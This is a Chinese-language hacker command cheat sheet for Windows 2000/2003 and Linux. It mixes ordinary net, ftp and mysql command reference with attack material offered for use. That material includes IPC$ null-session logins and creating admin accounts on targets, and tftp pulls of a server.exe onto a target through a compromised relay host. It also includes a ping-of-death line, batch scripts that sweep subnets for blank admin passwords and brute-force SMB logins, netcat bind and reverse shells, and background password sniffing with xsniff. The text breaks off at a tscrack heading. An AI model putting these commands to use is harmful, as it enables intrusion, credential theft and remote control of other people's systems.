net use //ip/ipc$ " " /user:" " 建立IPC空鏈接
net use //ip/ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: //ip/c$ "密碼" /user:"用戶名" 直接登陸后映射對(duì)方C:到本地為
H:
net use h: //ip/c$ 登陸后映射對(duì)方C:到本地為H:
net use //ip/ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對(duì)方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把“用戶”添加到管理員中使其
具有管理員權(quán)限,注意:administrator后加s用復(fù)數(shù)
net start 查看開啟了哪些服務(wù)
net start 服務(wù)名 開啟服務(wù);(如:net start telnet, net start schedule)
net stop 服務(wù)名 停止某服務(wù)
net time //目標(biāo)ip 查看對(duì)方時(shí)間
net time //目標(biāo)ip /set 設(shè)置本地計(jì)算機(jī)時(shí)間與“目標(biāo)IP”主機(jī)的時(shí)間同步,加
上參數(shù)/yes可取消確認(rèn)信息
net view 查看本地局域網(wǎng)內(nèi)開啟了哪些共享
net view //ip 查看對(duì)方局域網(wǎng)內(nèi)開啟了哪些共享
net config 顯示系統(tǒng)網(wǎng)絡(luò)設(shè)置
net logoff 斷開連接的共享
net pause 服務(wù)名 暫停某服務(wù)
net send ip "文本信息" 向?qū)Ψ桨l(fā)信息
net ver 局域網(wǎng)內(nèi)正在使用的網(wǎng)絡(luò)連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸后用將密碼改為12345
net password 密碼 更改系統(tǒng)登陸密碼
netstat -a 查看開啟了哪些端口,常用netstat -an
netstat -n 查看端口的網(wǎng)絡(luò)連接情況,常用netstat -an
netstat -v 查看正在進(jìn)行的工作
netstat -p 協(xié)議名 例:netstat -p tcq/ip 查看某協(xié)議使用情況(查看tcp/ip
協(xié)議使用情況)
netstat -s 查看正在使用的所有協(xié)議使用情況
nbtstat -A ip 對(duì)方136到139其中一個(gè)端口開了的話,就可查看對(duì)方最近登陸的
用戶名(03前的為用戶名)-注意:參數(shù)-A要大寫
tracert -參數(shù) ip(或計(jì)算機(jī)名) 跟蹤路由(數(shù)據(jù)包),參數(shù):“-w數(shù)字”用于設(shè)
置超時(shí)間隔。
ping ip(或域名) 向?qū)Ψ街鳈C(jī)發(fā)送默認(rèn)大小為32字節(jié)的數(shù)據(jù),參數(shù):“-l[空格]
數(shù)據(jù)包大小”;“-n發(fā)送數(shù)據(jù)次數(shù)”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(發(fā)送大于64K的文件并一直ping就成了死亡之
ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,
ipconfig可用參數(shù)“/all”顯示全部配置信息
tlist -t 以樹行列表顯示進(jìn)程(為系統(tǒng)的附加工具,默認(rèn)是沒有安裝的,在安裝
目錄的Support/tools文件夾內(nèi))
kill -F 進(jìn)程名 加-F參數(shù)后強(qiáng)制結(jié)束某進(jìn)程(為系統(tǒng)的附加工具,默認(rèn)是沒有安
裝的,在安裝目錄的Support/tools文件夾內(nèi))
del -F 文件名 加-F參數(shù)后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除
只讀、隱藏、系統(tǒng)、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏
、系統(tǒng)、存檔以外的文件。例如“DEL/AR *.*”表示刪除當(dāng)前目錄下所有只讀文
件,“DEL/A-S *.*”表示刪除當(dāng)前目錄下除系統(tǒng)文件以外的所有文件
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和
文件。同時(shí)使用參數(shù)/Q 可取消刪除操作時(shí)的系統(tǒng)確認(rèn)就直接刪除。(二個(gè)命令作
用相同)
move 盤符/路徑/要移動(dòng)的文件名 存放移動(dòng)文件的路徑/移動(dòng)后文件名 移動(dòng)文件
,用參數(shù)/y將取消確認(rèn)移動(dòng)目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對(duì)比二個(gè)文件并把不同之處輸出到3st.txt文件
中,"> "和"> >" 是重定向命令
at id號(hào) 開啟已注冊(cè)的某個(gè)計(jì)劃任務(wù)
at /delete 停止所有計(jì)劃任務(wù),用參數(shù)/yes則不需要確認(rèn)就直接停止
at id號(hào) /delete 停止某個(gè)已注冊(cè)的計(jì)劃任務(wù)
at 查看所有的計(jì)劃任務(wù)
at //ip time 程序名(或一個(gè)命令) /r 在某時(shí)間運(yùn)行對(duì)方某程序并重新啟動(dòng)計(jì)算
機(jī)
finger username @host 查看最近有哪些用戶登陸
telnet ip 端口 遠(yuǎn)和登陸服務(wù)器,默認(rèn)端口為23
open ip 連接到IP(屬telnet登陸后的命令)
telnet 在本機(jī)上直接鍵入telnet 將進(jìn)入本機(jī)的telnet
copy 路徑/文件名1 路徑/文件名2 /y 復(fù)制文件1到指定的目錄為文件2,用參數(shù)
/y就同時(shí)取消確認(rèn)你要改寫一份現(xiàn)存目錄文件
copy c:/srv.exe //ip/admin$ 復(fù)制本地c:/srv.exe到對(duì)方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內(nèi)容藏身到1st.jpg中生成
3st.jpg新的文件,注:2st.txt文件頭要空三排,參數(shù):/b指二進(jìn)制文件,/a指
ASCLL格式文件
copy //ip/admin$/svv.exe c:/ 或:copy//ip/admin$/*.* 復(fù)制對(duì)方admini$共享
下的srv.exe文件(所有文件)至本地C:
xcopy 要復(fù)制的文件或目錄樹 目標(biāo)地址/目錄名 復(fù)制文件和目錄樹,用參數(shù)/Y
將不提示覆蓋相同文件
tftp -i 自己IP(用肉機(jī)作跳板時(shí)這用肉機(jī)IP) get server.exe c:/server.exe
登陸后,將“IP”的server.exe下載到目標(biāo)主機(jī)c:/server.exe 參數(shù):-i指以二
進(jìn)制模式傳送,如傳送exe文件時(shí)用,如不加-i 則以ASCII模式(傳送文本文件模
式)進(jìn)行傳送
tftp -i 對(duì)方IP put c:/server.exe 登陸后,上傳本地c:/server.exe至主機(jī)
ftp ip 端口 用于上傳文件至服務(wù)器或進(jìn)行文件操作,默認(rèn)端口為21。bin指用二
進(jìn)制方式傳送(可執(zhí)行文件進(jìn));默認(rèn)為ASCII格式傳送(文本文件時(shí))
route print 顯示出IP路由,將主要顯示網(wǎng)絡(luò)地址Network addres,子網(wǎng)掩碼
Netmask,網(wǎng)關(guān)地址Gateway addres,接口地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負(fù)責(zé)把一個(gè)IP解析成一個(gè)物理
性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個(gè)新窗口并最大化(最小化)運(yùn)行某程
序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀
,系統(tǒng),隱藏 屬性;用+則是添加為某屬性
dir 查看文件,參數(shù):/Q顯示文件及目錄屬系統(tǒng)哪個(gè)用戶,/T:C顯示文件創(chuàng)建時(shí)
間,/T:A顯示文件上次被訪問時(shí)間,/T:W上次被修改時(shí)間
date /t 、 time /t 使用此參數(shù)即“DATE/T”、“TIME/T”將只顯示當(dāng)前日期和
時(shí)間,而不必輸入新日期和時(shí)間
set 指定環(huán)境變量名稱=要指派給變量的字符 設(shè)置環(huán)境變量
set 顯示當(dāng)前所有的環(huán)境變量
set p(或其它字符) 顯示出當(dāng)前以字符p(或其它字符)開頭的所有環(huán)境變量
pause 暫停批處理程序,并顯示出:請(qǐng)按任意鍵繼續(xù)....
if 在批處理程序中執(zhí)行條件處理(更多說明見if命令及變量)
goto 標(biāo)簽 將cmd.exe導(dǎo)向到批處理程序中帶標(biāo)簽的行(標(biāo)簽必須單獨(dú)一行,且以
冒號(hào)打頭,例如:“:start”標(biāo)簽)
call 路徑/批處理文件名 從批處理程序中調(diào)用另一個(gè)批處理程序 (更多說明見
call /?)
for 對(duì)一組文件中的每一個(gè)文件執(zhí)行某個(gè)特定命令(更多說明見for命令及變量)
echo on或off 打開或關(guān)閉echo,僅用echo不加參數(shù)則顯示當(dāng)前echo設(shè)置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字符串hello
find 文件名 查找某文件
title 標(biāo)題名字 更改CMD窗口標(biāo)題名字
color 顏色值 設(shè)置cmd控制臺(tái)前景和背景顏色;0=黑、1=藍(lán)、2=綠、3=淺綠
、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍(lán)、A=淡綠、B=淡淺綠、C=淡紅、
D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:/、D:/統(tǒng)一改為:EntSky/ )
print 文件名 打印文本文件
ver 在DOS窗口下顯示版本信息
winver 彈出一個(gè)窗口顯示版本信息(內(nèi)存大小、系統(tǒng)版本、補(bǔ)丁版本、計(jì)算機(jī)名
)
format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT32、NTFS ,例:Format D:
/FS:NTFS
md 目錄名 創(chuàng)建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結(jié)構(gòu)顯示出目錄,用參數(shù)-f 將列出第個(gè)文件夾中文件名稱
type 文件名 顯示文本文件的內(nèi)容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令=字符
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調(diào)用win2k命令,
并創(chuàng)建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);
解鎖:doskey dir=
taskmgr 調(diào)出任務(wù)管理器
chkdsk /F D: 檢查磁盤D并顯示狀態(tài)報(bào)告;加參數(shù)/f并修復(fù)磁盤上的錯(cuò)誤
tlntadmn telnt服務(wù)admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務(wù)
默認(rèn)端口23為其它任何端口
exit 退出cmd.exe程序或目前,用參數(shù)/B則是退出當(dāng)前批處理腳本而不是cmd.exe
path 路徑/可執(zhí)行文件的文件名 為可執(zhí)行文件設(shè)置一個(gè)路徑。
cmd 啟動(dòng)一個(gè)win2K命令解釋窗口。參數(shù):/eff、/en 關(guān)閉、開啟命令擴(kuò)展;更我
詳細(xì)說明見cmd /?
regedit /s 注冊(cè)表文件名 導(dǎo)入注冊(cè)表;參數(shù)/S指安靜模式導(dǎo)入,無任何提示;
regedit /e 注冊(cè)表文件名 導(dǎo)出注冊(cè)表
cacls 文件名 參數(shù) 顯示或修改文件訪問控制列表(ACL)--針對(duì)NTFS格式時(shí)
。參數(shù):/D 用戶名:設(shè)定拒絕某用戶訪問;/P 用戶名erm 替換指定用戶的訪問
權(quán)限;/G 用戶名erm 賦予指定用戶訪問權(quán)限;Perm 可以是: N 無,R 讀取,
W 寫入, C 更改(寫入),F(xiàn) 完全控制;例:cacls D:/test.txt /D pub 設(shè)定
d:/test.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶權(quán)限列表
REM 文本內(nèi)容 在批處理文件中添加注解
netsh 查看或更改本地網(wǎng)絡(luò)配置情況
IIS服務(wù)命令:
iisreset /reboot 重啟win2k計(jì)算機(jī)(但有提示系統(tǒng)將重啟信息出現(xiàn))
iisreset /start或stop 啟動(dòng)(停止)所有Internet服務(wù)
iisreset /restart 停止然后重新啟動(dòng)所有Internet服務(wù)
iisreset /status 顯示所有Internet服務(wù)狀態(tài)
iisreset /enable或disable 在本地系統(tǒng)上啟用(禁用)Internet服務(wù)的重新啟
動(dòng)
iisreset /rebootonerror 當(dāng)啟動(dòng)、停止或重新啟動(dòng)Internet服務(wù)時(shí),若發(fā)生錯(cuò)
誤將重新開機(jī)
iisreset /noforce 若無法停止Internet服務(wù),將不會(huì)強(qiáng)制終止Internet服務(wù)
iisreset /timeout Val在到達(dá)逾時(shí)間(秒)時(shí),仍未停止Internet服務(wù),若指定
/rebootonerror參數(shù),則電腦將會(huì)重新開機(jī)。預(yù)設(shè)值為重新啟動(dòng)20秒,停止60秒
,重新開機(jī)0秒。
FTP 命令: (后面有詳細(xì)說明內(nèi)容)
ftp的命令行格式為:
ftp -v -d -i -n -g[主機(jī)名] -v 顯示遠(yuǎn)程服務(wù)器的所有響應(yīng)信息。
-d 使用調(diào)試方式。
-n 限制ftp的自動(dòng)登錄,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令說明
bye 或 quit 終止主機(jī)FTP進(jìn)程,并退出FTP管理方式.
pwd 列出當(dāng)前遠(yuǎn)端主機(jī)目錄
put 或 send 本地文件名 [上傳到主機(jī)上的文件名] 將本地一個(gè)文件傳送至遠(yuǎn)端
主機(jī)中
get 或 recv [遠(yuǎn)程主機(jī)文件名] [下載到本地后的文件名] 從遠(yuǎn)端主機(jī)中傳送至
本地主機(jī)中
mget [remote-files] 從遠(yuǎn)端主機(jī)接收一批文件至本地主機(jī)
mput local-files 將本地主機(jī)中一批文件傳送至遠(yuǎn)端主機(jī)
dir 或 ls [remote-directory] [local-file] 列出當(dāng)前遠(yuǎn)端主機(jī)目錄中的文件.
如果有本地文件,就將結(jié)果寫至本地文件
ascii 設(shè)定以ASCII方式傳送文件(缺省值)
bin 或 image 設(shè)定以二進(jìn)制方式傳送文件
bell 每完成一次文件傳送,報(bào)警提示
cdup 返回上一級(jí)目錄
close 中斷與遠(yuǎn)程服務(wù)器的ftp會(huì)話(與open對(duì)應(yīng))
open host[port] 建立指定ftp服務(wù)器連接,可指定連接端口
delete 刪除遠(yuǎn)端主機(jī)中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠(yuǎn)端主機(jī)中建立目錄
rename [from] [to] 改變遠(yuǎn)端主機(jī)中的文件名
rmdir directory-name 刪除遠(yuǎn)端主機(jī)中的目錄
status 顯示當(dāng)前FTP的狀態(tài)
system 顯示遠(yuǎn)端主機(jī)系統(tǒng)類型
user user-name [password] [account] 重新以別的用戶名登錄遠(yuǎn)端主機(jī)
open host [port] 重新建立一個(gè)新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當(dāng)前本地主機(jī)的工作目錄,如果缺省,就轉(zhuǎn)到當(dāng)前用戶的HOME目錄
chmod 改變遠(yuǎn)端主機(jī)的文件權(quán)限
case 當(dāng)為ON時(shí),用MGET命令拷貝的文件名到本地機(jī)器中,全部轉(zhuǎn)換為小寫字母
cd remote-dir 進(jìn)入遠(yuǎn)程主機(jī)目錄
cdup 進(jìn)入遠(yuǎn)程主機(jī)目錄的父目錄
! 在本地機(jī)中執(zhí)行交互shell,exit回到ftp環(huán)境,如!ls*.zip
MYSQL 命令:
mysql -h主機(jī)地址 -u用戶名 -p密碼 連接MYSQL;如果剛安裝好MYSQL,超級(jí)用戶
root是沒有密碼的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格,其它也一樣)
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 數(shù)據(jù)庫(kù).* to 用戶名@登錄主機(jī) identified by /"密碼/"; 增
加新用戶。(注意:和上面不同,下面的因?yàn)槭荕YSQL環(huán)境中的命令,所以后面都
帶一個(gè)分號(hào)作為命令結(jié)束符)
show databases; 顯示數(shù)據(jù)庫(kù)列表。剛開始時(shí)才兩個(gè)數(shù)據(jù)庫(kù):mysql和test。
mysql庫(kù)很重要它里面有MYSQL的系統(tǒng)信息,我們改密碼和新增用戶,實(shí)際上就是
用這個(gè)庫(kù)進(jìn)行操作。
use mysql;
show tables; 顯示庫(kù)中的數(shù)據(jù)表
describe 表名; 顯示數(shù)據(jù)表的結(jié)構(gòu)
create database 庫(kù)名; 建庫(kù)
use 庫(kù)名;
create table 表名 (字段設(shè)定列表); 建表
drop database 庫(kù)名;
drop table 表名; 刪庫(kù)和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqldump --opt school>school.bbb 備份數(shù)據(jù)庫(kù):(命令在DOS的//mysql//bin
目錄下執(zhí)行);注釋:將數(shù)據(jù)庫(kù)school備份到school.bbb文件,school.bbb是一個(gè)
文本文件,文件名任取,打開看看你會(huì)有新發(fā)現(xiàn)。
win2003系統(tǒng)下新增命令(實(shí)用部份):
shutdown /參數(shù) 關(guān)閉或重啟本地或遠(yuǎn)程主機(jī)。
參數(shù)說明:/S 關(guān)閉主機(jī),/R 重啟主機(jī), /T 數(shù)字 設(shè)定延時(shí)的時(shí)間,范圍0~180
秒之間, /A取消開機(jī),/M //IP 指定的遠(yuǎn)程主機(jī)。
例:shutdown /r /t 0 立即重啟本地主機(jī)(無延時(shí))
taskill /參數(shù) 進(jìn)程名或進(jìn)程的pid 終止一個(gè)或多個(gè)任務(wù)和進(jìn)程。
參數(shù)說明:/PID 要終止進(jìn)程的pid,可用tasklist命令獲得各進(jìn)程的pid,/IM 要
終止的進(jìn)程的進(jìn)程名,/F 強(qiáng)制終止進(jìn)程,/T 終止指定的進(jìn)程及他所啟動(dòng)的子進(jìn)
程。
tasklist 顯示當(dāng)前運(yùn)行在本地和遠(yuǎn)程主機(jī)上的進(jìn)程、服務(wù)、服務(wù)各進(jìn)程的進(jìn)程標(biāo)
識(shí)符(PID)。
參數(shù)說明:/M 列出當(dāng)前進(jìn)程加載的dll文件,/SVC 顯示出每個(gè)進(jìn)程對(duì)應(yīng)的服務(wù),
無參數(shù)時(shí)就只列出當(dāng)前的進(jìn)程。
Linux系統(tǒng)下基本命令: 要區(qū)分大小寫
uname 顯示版本信息(同win2K的 ver)
dir 顯示當(dāng)前目錄文件,ls -al 顯示包括隱藏文件(同win2K的 dir)
pwd 查詢當(dāng)前所在的目錄位置
cd cd ..回到上一層目錄,注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名 查看文件內(nèi)容
cat >abc.txt 往abc.txt文件中寫上內(nèi)容。
more 文件名 以一頁(yè)一頁(yè)的方式顯示一個(gè)文本文件。
cp 復(fù)制文件
mv 移動(dòng)文件
rm 文件名 刪除文件,rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄,目錄內(nèi)沒有文檔。
chmod 設(shè)定檔案或目錄的存取權(quán)限
grep 在檔案中查找字符串
diff 檔案文件比較
find 檔案搜尋
date 現(xiàn)在的日期、時(shí)間
who 查詢目前和你使用同一臺(tái)機(jī)器的人以及Login時(shí)間地點(diǎn)
w 查詢目前上機(jī)者的詳細(xì)資料
whoami 查看自己的帳號(hào)名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進(jìn)程狀態(tài)
kill 停止某進(jìn)程
gcc 黑客通常用它來編譯C語(yǔ)言寫的文件
su 權(quán)限轉(zhuǎn)換為指定使用者
telnet IP telnet連接對(duì)方主機(jī)(同win2K),當(dāng)出現(xiàn)bash$時(shí)就說明連接成功。
ftp ftp連接上某服務(wù)器(同win2K)
附:批處理命令與變量
1:for命令及變量 基本格式:
FOR /參數(shù) %variable IN (set) DO command [command_parameters] %variable:
指定一個(gè)單一字母可替換的參數(shù),如:%i ,而指定一個(gè)變量則用:%%i ,而調(diào)用
變量時(shí)用:%i% ,變量是區(qū)分大小寫的(%i 不等于 %I)。
批處理每次能處理的變量從%0-%9共10個(gè),其中%0默認(rèn)給批處理文件名使用,%1
默認(rèn)為使用此批處理時(shí)輸入的的第一個(gè)值,同理:%2-%9指輸入的第2-9個(gè)值;例
:net use //ip/ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3
(set):指定一個(gè)或一組文件,可使用通配符,如:(D:/user.txt)和(1 1 254)(1
-1 254),{“(1 1 254)”第一個(gè)"1"指起始值,第二個(gè)"1"指增長(zhǎng)量,第三個(gè)"254"
指結(jié)束值,即:從1到254;“(1 -1 254)”說明:即從254到1}
command:指定對(duì)第個(gè)文件執(zhí)行的命令,如:net use命令;如要執(zhí)行多個(gè)命令時(shí)
,命令這間加:& 來隔開
command_parameters:為特定命令指定參數(shù)或命令行開關(guān)
IN (set):指在(set)中取值;DO command :指執(zhí)行command
參數(shù):/L 指用增量形式{(set)為增量形式時(shí)};/F 指從文件中不斷取值,直到取
完為止{(set)為文件時(shí),如(d:/pass.txt)時(shí)}。
用法舉例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use //%1.%%G
/user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明:對(duì)指定的一個(gè)C類網(wǎng)段的254個(gè)IP依次試建立administrator
密碼為空的IPC$連接,如果成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理默認(rèn)
的 %1;%%G 為變量(ip的最后一位);& 用來隔開echo 和net use 這二個(gè)命令;
| 指建立了ipc$后,在結(jié)果中用find查看是否有"命令成功完成"信息;%1.%%G 為
完整的IP地址;(1 1 254) 指起始值,增長(zhǎng)量,結(jié)止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:/user.dic) DO smb.exe %1 %%i D:/pass.dic 200
存為:ok.exe 說明:輸入一個(gè)IP后,用字典文件d:/pass.dic來暴解d:/user.dic
中的用戶密碼,直到文件中值取完為止。%%i為用戶名;%1為輸入的IP地址(默認(rèn)
)。
2:if命令及變量 基本格式:
IF [not] errorlevel 數(shù)字 命令語(yǔ)句 如果程序運(yùn)行最后返回一個(gè)等于或大于指
定數(shù)字的退出編碼,指定條件為“真”。
例:IF errorlevel 0 命令 指程序執(zhí)行后返回的值為0時(shí),就值行后面的命令;
IF not errorlevel 1 命令指程序執(zhí)行最后返回的值不等于1,就執(zhí)行后面的命令
。
0 指發(fā)現(xiàn)并成功執(zhí)行(真);1 指沒有發(fā)現(xiàn)、沒執(zhí)行(假)。
IF [not] 字符串1==字符串2 命令語(yǔ)句 如果指定的文本字符串匹配(即:字符串
1 等于 字符串2),就執(zhí)行后面的命令。
例:“if "%2%"=="4" goto start”指:如果輸入的第二個(gè)變量為4時(shí),執(zhí)行后面
的命令(注意:調(diào)用變量時(shí)就%變量名%并加" ")
IF [not] exist 文件名 命令語(yǔ)句 如果指定的文件名存在,就執(zhí)行后面的命令。
例:“if not nc.exe goto end”指:如果沒有發(fā)現(xiàn)nc.exe文件就跳到":end"標(biāo)
簽處。
IF [not] errorlevel 數(shù)字 命令語(yǔ)句 else 命令語(yǔ)句或 IF [not] 字符串1==字
符串2 命令語(yǔ)句 else 命令語(yǔ)句或 IF [not] exist 文件名 命令語(yǔ)句 else 命令
語(yǔ)句 加上:else 命令語(yǔ)句后指:當(dāng)前面的條件不成立時(shí),就指行else后面的命
令。注意:else 必須與 if 在同一行才有效。 當(dāng)有del命令時(shí)需把del命令全部
內(nèi)容用< >括起來,因?yàn)閐el命令要單獨(dú)一行時(shí)才能執(zhí)行,用上< >后就等于是單獨(dú)
一行了;例如:“if exist test.txt. else echo
test.txt.missing ”,注意命令中的“.”
(二)系統(tǒng)外部命令(均需下載相關(guān)工具):
1、瑞士軍刀:nc.exe
參數(shù)說明:
-h 查看幫助信息
-d 后臺(tái)模式
-e prog程序重定向,一但連接就執(zhí)行[危險(xiǎn)]
-i secs延時(shí)的間隔
-l 監(jiān)聽模式,用于入站連接
-L 監(jiān)聽模式,連接天閉后仍然繼續(xù)監(jiān)聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進(jìn)制的傳輸
-p[空格]端口 本地端口號(hào)
-r 隨機(jī)本地及遠(yuǎn)程端口
-t 使用Telnet交互方式
-u UDP模式
-v 詳細(xì)輸出,用-vv將更詳細(xì)
-w數(shù)字 timeout延時(shí)間隔
-z 將輸入,輸出關(guān)掉(用于掃錨時(shí))
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機(jī)的80端口
nc -l -p 80 開啟本機(jī)的TCP 80端口并監(jiān)聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024端口
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機(jī)的cmdshell在
remote的TCP 5354端口
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機(jī)的
cmdshell并反向連接192.168.0.2的5354端口
高級(jí)用法:
nc -L -p 80 作為蜜罐用1:開啟并不停地監(jiān)聽80端口,直到CTR+C為止
nc -L -p 80 > c:/log.txt 作為蜜罐用2:開啟并不停地監(jiān)聽80端口,直到
CTR+C,同時(shí)把結(jié)果輸出到c:/log.txt
nc -L -p 80 < c:/honeyport.txt 作為蜜罐用3-1:開啟并不停地監(jiān)聽80端口,
直到CTR+C,并把c:/honeyport.txt中內(nèi)容送入管道中,亦可起到傳送文件作用
type.exe c:/honeyport | nc -L -p 80 作為蜜罐用3-2:開啟并不停地監(jiān)聽80端
口,直到CTR+C,并把c:/honeyport.txt中內(nèi)容送入管道中,亦可起到傳送文件作用
本機(jī)上用:nc -l -p 本機(jī)端口
在對(duì)方主機(jī)上用:nc -e cmd.exe 本機(jī)IP -p 本機(jī)端口 *win2K
nc -e /bin/sh 本機(jī)IP -p 本機(jī)端口 *linux,unix 反向連接突破對(duì)方主機(jī)的防火
墻
本機(jī)上用:nc -d -l -p 本機(jī)端口 < 要傳送的文件路徑及名稱
在對(duì)方主機(jī)上用:nc -vv 本機(jī)IP 本機(jī)端口 > 存放文件的路徑及名稱 傳送文件
到對(duì)方主機(jī)
備 注:
| 管道命令
< 或 > 重定向命令?!?lt;”,例如:tlntadmn < test.txt 指把test.txt的內(nèi)容
賦值給tlntadmn命令
@ 表示執(zhí)行@后面的命令,但不會(huì)顯示出來(后臺(tái)執(zhí)行);例:@dir c:/winnt
>> d:/log.txt 意思是:后臺(tái)執(zhí)行dir,并把結(jié)果存在d:/log.txt中
>與>>的區(qū)別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:/winnt >> d:/log.txt和@dir c:/winnt > d:/log.txt二個(gè)命令分別
執(zhí)行二次比較看:用>>的則是把二次的結(jié)果都保存了,而用:>則只有一次的結(jié)果
,是因?yàn)榈诙蔚慕Y(jié)果把第一次的覆蓋了。
2、掃錨工具:xscan.exe
基本格式
xscan -host <起始IP>[-<終止IP>] <檢測(cè)項(xiàng)目> [其他選項(xiàng)] 掃錨"起始IP到終止
IP"段的所有主機(jī)信息
xscan -file <主機(jī)列表文件名> <檢測(cè)項(xiàng)目> [其他選項(xiàng)] 掃錨"主機(jī)IP列表文件
名"中的所有主機(jī)信息
檢測(cè)項(xiàng)目
-active 檢測(cè)主機(jī)是否存活
-os 檢測(cè)遠(yuǎn)程操作系統(tǒng)類型(通過NETBIOS和SNMP協(xié)議)
-port 檢測(cè)常用服務(wù)的端口狀態(tài)
-ftp 檢測(cè)FTP弱口令
-pub 檢測(cè)FTP服務(wù)匿名用戶寫權(quán)限
-pop3 檢測(cè)POP3-Server弱口令
-smtp 檢測(cè)SMTP-Server漏洞
-sql 檢測(cè)SQL-Server弱口令
-smb 檢測(cè)NT-Server弱口令
-iis 檢測(cè)IIS編碼/解碼漏洞
-cgi 檢測(cè)CGI漏洞
-nasl 加載Nessus攻擊腳本
-all 檢測(cè)以上所有項(xiàng)目
其它選項(xiàng)
-i 適配器編號(hào) 設(shè)置網(wǎng)絡(luò)適配器, <適配器編號(hào)>可通過"-l"參數(shù)獲取
-l 顯示所有網(wǎng)絡(luò)適配器
-v 顯示詳細(xì)掃描進(jìn)度
-p 跳過沒有響應(yīng)的主機(jī)
-o 跳過沒有檢測(cè)到開放端口的主機(jī)
-t 并發(fā)線程數(shù)量,并發(fā)主機(jī)數(shù)量 指定最大并發(fā)線程數(shù)量和并發(fā)主機(jī)數(shù)量, 默
認(rèn)數(shù)量為100,10
-log 文件名 指定掃描報(bào)告文件名 (后綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測(cè)
192.168.1.1-192.168.255.255網(wǎng)段內(nèi)主機(jī)的所有漏洞,跳過無響應(yīng)的主機(jī)
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測(cè)
192.168.1.1-192.168.255.255網(wǎng)段內(nèi)主機(jī)的標(biāo)準(zhǔn)端口狀態(tài),NT弱口令用戶,最大
并發(fā)線程數(shù)量為150,跳過沒有檢測(cè)到開放端口的主機(jī)
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測(cè)“hostlist.txt”
文件中列出的所有主機(jī)的標(biāo)準(zhǔn)端口狀態(tài),CGI漏洞,最大并發(fā)線程數(shù)量為200,同
一時(shí)刻最多檢測(cè)5臺(tái)主機(jī),顯示詳細(xì)檢測(cè)進(jìn)度,跳過沒有檢測(cè)到開放端口的主機(jī)
3、命令行方式嗅探器: xsniff.exe
可捕獲局域網(wǎng)內(nèi)FTP/SMTP/POP3/HTTP協(xié)議密碼
參數(shù)說明
-tcp 輸出TCP數(shù)據(jù)報(bào)
-udp 輸出UDP數(shù)據(jù)報(bào)
-icmp 輸出ICMP數(shù)據(jù)報(bào)
-pass 過濾密碼信息
-hide 后臺(tái)運(yùn)行
-host 解析主機(jī)名
-addr IP地址 過濾IP地址
-port 端口 過濾端口
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進(jìn)制形式輸出
用法示例
xsniff.exe -pass -hide -log pass.log 后臺(tái)運(yùn)行嗅探密碼并將密碼信息保存在
pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并過濾tcp和
udp信息并以ASCII格式輸出
4、終端服務(wù)密碼破解: tscrack.exe
